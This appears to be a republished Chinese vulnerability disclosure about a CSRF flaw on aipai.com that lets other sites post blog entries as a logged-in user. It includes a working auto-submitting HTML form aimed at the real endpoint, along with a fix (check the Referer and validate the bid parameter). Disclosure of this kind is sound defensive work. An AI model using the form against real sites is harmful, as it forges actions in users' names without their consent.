爱拍CSRF 未经用户同意可更新日志 - 网站安全 --自学php网

爱拍CSRF 未经用户同意可更新日志 - 网站安全 -

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] 在接受POST信息时，未对POST来路(Referer)进行验证，对POST信息中的bid要求不严，导致漏洞产生。漏洞证明：漏洞地址：http://www.aipai.com/space.phphtmlbody www.2cto.comform id=imlonghao name=i......

在接受POST信息时，未对POST来路(Referer)进行验证，对POST信息中的bid要求不严，导致漏洞产生。
漏洞证明：漏洞地址：
http://www.aipai.com/space.php

<html>
<body> www.2cto.com
<form id="imlonghao" name="imlonghao" action="http://www.aipai.com/space.php" method="post">
<input type="text" name="action" value="blog" />
<input type="text" name="post" value="true" />
<input type="text" name="comment" value="XX" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>

原本POST信息中有一个bid的信息，就是写上自己的ID，本来以为会失败的，谁知道一删除这段代码也能照样更新日志。

接口返回信息

效果

修复方案：

检查POST来路Referer
严格检查POST信息中的bid参数，严格判断是否为用户

作者 imlonghao

知乎存储型xss及修复可获取用户cookie信息 - 网站

xss获取街旁网官方账号-街小旁 - 网站安全 - 自学

子栏目

爱拍CSRF 未经用户同意可更新日志 - 网站安全 -

最新评论

添加评论

更多文章推荐

添加评论